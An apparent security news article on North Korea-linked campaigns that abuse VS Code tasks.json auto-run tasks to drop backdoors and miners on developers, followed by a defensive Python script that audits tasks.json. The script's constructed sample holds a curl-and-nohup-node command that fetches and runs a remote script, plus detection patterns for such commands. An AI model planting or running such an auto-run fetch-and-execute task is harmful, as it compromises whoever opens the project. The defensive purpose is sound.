Security researchers have for weeks been watching a disturbing variation in the techniques of North Korea-linked groups: instead of relying only on classic phishing emails or web exploits, they are exploiting the daily workflow of developers. The trick is to convince engineers, especially those working in cryptocurrency, blockchain and finance, to clone a repository and open the project in Visual Studio Code, using a supposed technical exercise or a job offer as the hook. If the victim trusts the repository and opens the project, a chain is triggered that can end up delivering a backdoor with remote execution capabilities.
The central mechanism of the attack is the VS Code task configuration file (tasks.json), whose tasks can be configured to run automatically when the project folder is opened. That option, legitimately used to automate development tasks, is being abused to orchestrate the download and execution of obfuscated JavaScript code hosted on external services such as domains on Vercel. Public investigations and technical reports have documented how this same tactic has served to deploy malware families such as BeaverTail (Node.js layer) and InvisibleFerret (Python layer), as well as miners and backdoors already known in this threat ecosystem.

The initial analyses, published by groups such as OpenSourceMalware and extended by firms such as Jamf, show a constant evolution: when the project is opened in VS Code, the application asks the user whether to trust the repository author; if that trust is granted, VS Code automatically processes tasks.json and can run arbitrary commands on the machine. On macOS, for example, the execution chain has been seen launching in the background, using standard system tools, to retrieve and run a JavaScript payload with Node.js, which lets the process continue even if the editor is closed.
The remote JavaScript acts as the main implant: it creates a persistent loop that collects basic information about the computer, fingerprints the host and maintains continuous communication with a command-and-control server, enabling remote code execution. In some incidents, minutes after the initial infection, additional instructions were downloaded that beacon to the server every few seconds, execute more code and, on the operator's command, clean up traces to hinder investigation. Researchers have even pointed to signs that artificial intelligence tools were used to generate parts of the code, based on the presence of inline comments and certain stylistic traits in the JavaScript.
In addition to the main technique, the actors have prepared fallback routes to maximize their success rate. If the VS Code task fails to retrieve the payload from Vercel, the repository can hide sophisticated droppers within files that appear harmless, for example "dictionaries" for spell checking, that also contain obfuscated JavaScript. In other cases the victim is offered the installation of a malicious npm package (identified in public analyses as grayavatar) or the download of a Node.js component that in turn launches modules to log keystrokes, capture the screen, search for sensitive files in the user's home directory, replace wallet addresses copied to the clipboard and extract credentials from browsers. In parallel, the attackers set up a Python environment that enables cryptocurrency mining with XMRig, remote access tooling and data exfiltration.
Additional research has documented variants with different names and components: teams such as Asgard Network have analyzed repositories that distribute a backdoor called Tsunami (also known as TsunamiKit) together with an XMRig miner, while other technical reports have described how attackers approach victims through professional networks such as LinkedIn to send links to technical tests that point to malicious repositories, exploiting professional trust.
Behind these operations are actors linked to the North Korean regime, who have historically focused on software specialists with access to financial infrastructure and digital keys. The benefit for the attacking group is clear: access to source code, secrets and accounts and, in many cases, the ability to move or steal digital assets. The variety and multiplicity of the observed vectors suggest a deliberate strategy of experimenting with different techniques to increase the likelihood of compromise and, therefore, the capacity to finance their operations.

These campaigns are also a lesson in how legitimate developer tools can become attack vectors when external content is blindly trusted. Visual Studio Code offers functions designed to save time, but that automation can become dangerous if controls and good practices are not applied. If you want to look into how VS Code tasks work, the official documentation is a good starting point: Task documentation in Visual Studio Code.
For those working in development or managing technical teams, the recommendation is clear: do not automatically trust unknown repositories, review any tasks.json before allowing it to execute and treat external dependencies with caution. Organizations should complement these measures with network controls that block suspicious domains, restrictive deployment policies for development environments and detection tools that can identify beaconing, persistence and mining behaviour. Public reports and analyses from groups such as Jamf, Asgard Network and Security Alliance provide useful technical details for defenders who want to understand and mitigate these threats; you can consult their publications for further reading: Jamf, Asgard Network and Security Alliance.
In short, the threat is not only technical but cultural: trusting repositories and technical exercises without verifying their origin is a human vulnerability that attackers exploit with creativity. The good news is that, unlike zero-day vulnerabilities, this abuse is well managed by digital hygiene policies and practices: inspecting, questioning and limiting automatic execution in the development environment can prevent an interview or academic challenge from becoming the gateway for a persistent backdoor.
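The review step recommended above can be made routine. The following script is an added example, not code from the article or from any of the research groups it cites: it parses a repository's `.vscode/tasks.json` (which allows comments, so plain `json.loads` would fail), isolates tasks whose `runOptions.runOn` is `folderOpen` (the mechanism the article describes), and flags indicators a reviewer would want to see before granting workspace trust: network fetches, interpreter invocations, background detachment and suppressed terminal output. The embedded `SAMPLE_TASKS_JSON`, its URL and its task labels are constructed for the example and do not come from any real campaign.

```python
"""Audit a VS Code tasks.json for tasks that run automatically on folder open."""
import json
import re

# Constructed sample (not from any real repository). It mimics the pattern the
# article describes: an innocuous build task next to a folderOpen task that
# fetches a remote script and runs it with Node.js in the background.
SAMPLE_TASKS_JSON = r'''
{
  // tasks.json accepts comments, so the auditor has to strip them first
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s https://placeholder.example/p.js -o /tmp/p.js && nohup node /tmp/p.js &",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    }
  ]
}
'''

# Indicators worth flagging in an auto-run task. Dict order is the report order.
SUSPICIOUS_PATTERNS = {
    "network-fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "script-exec": re.compile(r"\b(node|python3?|bash|sh|powershell)\b", re.I),
    "background": re.compile(r"\bnohup\b|&\s*$|\bStart-Process\b", re.I),
    "encoded": re.compile(r"\bbase64\b|-enc(odedcommand)?\b", re.I),
}


def strip_jsonc(text: str) -> str:
    """Make JSONC loadable: drop block comments, whole-line // comments and
    trailing commas. Only whole-line // comments are removed so that the //
    inside URLs in command strings is left untouched."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"(?m)^\s*//.*$", "", text)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return text


def task_command_text(task: dict) -> str:
    """Flatten command and args, including per-OS overrides, into one string."""
    parts = []
    for scope in (task, task.get("windows") or {}, task.get("linux") or {}, task.get("osx") or {}):
        cmd = scope.get("command")
        if cmd:
            parts.append(cmd if isinstance(cmd, str) else " ".join(map(str, cmd)))
        parts.extend(str(a) for a in scope.get("args", []))
    return " ".join(parts)


def audit_tasks(jsonc_text: str) -> list[dict]:
    """Return one finding per task configured with runOn=folderOpen."""
    data = json.loads(strip_jsonc(jsonc_text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue  # only tasks that fire when the folder is opened matter here
        text = task_command_text(task)
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
        if (task.get("presentation") or {}).get("reveal") == "never":
            hits.append("hidden-output")  # output suppressed so the user sees nothing
        findings.append({"label": task.get("label", "<unnamed>"),
                         "command": text, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] auto-run task '{f['label']}': {', '.join(f['indicators']) or 'no indicators'}")
        print(f"    {f['command']}")
```

Any task in the report deserves a manual read before trust is granted, whether or not indicators fire, since a dropper hidden in a dictionary file (as the article describes for the fallback route) will not show up in tasks.json at all. The script complements, rather than replaces, VS Code's own `task.allowAutomaticTasks` setting, which when set to `"off"` stops folderOpen tasks from running in the first place.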